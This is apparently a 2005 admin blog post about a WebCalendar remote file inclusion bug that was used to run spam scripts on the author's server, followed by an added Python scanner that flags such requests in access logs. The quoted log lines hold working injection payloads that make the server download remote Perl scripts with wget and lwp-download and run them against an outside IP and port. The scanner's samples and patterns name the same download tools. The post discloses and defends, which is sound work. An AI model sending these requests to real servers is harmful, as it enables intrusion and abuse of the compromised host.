
27.10.2005 10:51

tuxx-home.at got hacked again


This time the problem was caused by a security bug in the webcalendar application of one virtual host on this site (fazerforum.motorradseiten.at).

Someone sent some commands like this to my server that allowed him to download some Perl scripts etc. to /tmp and execute them (no, /tmp is not executable; he or she called the perl interpreter directly to run these scripts).
vhosts/fazerforum.motorradseiten.at/access.log.0:201.32.151.217 - - [26/Oct/2005:13:20:54 +0200] \
    "GET /webcalendar//tools/send_reminders.php?includedir=\
    http://freewebbe.supereva.it/asc.txt?&cmd=cd%20/tmp;wget%20\
    http://alexaraojo.sites.uol.com.br/dc.txt
vhosts/fazerforum.motorradseiten.at/access.log.0:201.45.100.130 - - [27/Oct/2005:06:29:06 +0200] \
    "GET /webcalendar//tools/send_reminders.php?includedir=\
    http://freewebbe.supereva.it/asc.txt?&cmd=cd%20/tmp;lwp-download%20\
    http://www.tutoworld.org/xpl/dc.txt;perl%20dc.txt%20216.22.25.95%2017832
These scripts tried to send several thousand emails through my server, and therefore I had to deactivate the fazerforum until it is fixed.
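
A log scan for requests of the kind shown above, as an added example that is not part of the original post: it flags query parameters whose decoded value is a remote URL and notes parameters that invoke a download tool. The sample lines, hosts, IPs and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines (Apache combined format); hosts and IPs are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [26/Oct/2005:13:20:54 +0200] "GET /webcalendar//tools/send_reminders.php?includedir=http://files.example.org/a.txt?&cmd=cd%20/tmp;wget%20http://files.example.org/b.txt HTTP/1.1" 200 512 "-" "-"
192.0.2.11 - - [26/Oct/2005:13:21:10 +0200] "GET /webcalendar/month.php?date=20051026 HTTP/1.1" 200 8342 "-" "Mozilla/5.0"
192.0.2.12 - - [27/Oct/2005:06:29:06 +0200] "GET /webcalendar/tools/send_reminders.php?includedir=hTTp%253A%252F%252Ffiles.example.org%252Fa.txt HTTP/1.1" 200 512 "-" "-"
192.0.2.13 - - [27/Oct/2005:07:00:00 +0200] "GET /login.php?return=/webcalendar/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<target>\S+)')
REMOTE_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)
FETCH_RE = re.compile(r"\b(?:wget|curl|lwp-download)\b", re.IGNORECASE)


def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are still recognised."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(log_text):
    """Return one finding per request carrying a URL-valued query parameter."""
    findings = []
    # Lines that do not parse as a request are skipped.
    for m in filter(None, map(LINE_RE.match, log_text.splitlines())):
        path, _, query = m["target"].partition("?")
        remote, fetch = [], []
        # Split on '&' only: ';' is part of the injected command, not a separator.
        for pair in query.split("&"):
            name, value = (decode(p) for p in pair.partition("=")[::2])
            if REMOTE_RE.match(value):
                remote.append(name)
            if FETCH_RE.search(value):
                fetch.append(name)
        if remote:
            findings.append({"ip": m["ip"], "time": m["ts"], "path": path,
                             "remote_params": remote, "fetch_params": fetch})
    return findings


if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Parameters that legitimately carry URLs, such as redirect targets, will also match, so hits are triage input rather than a verdict.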

More news later on, when I finally get rid of this issue.

Update:
After searching through the web, I found the security issue on the webcalendar project page and a discussion about this issue here.

It seems that this issue is quite easy to fix, so I'll fix it now.
If you're using webcalendar, I strongly encourage you to apply the fix or update to 1.0.1!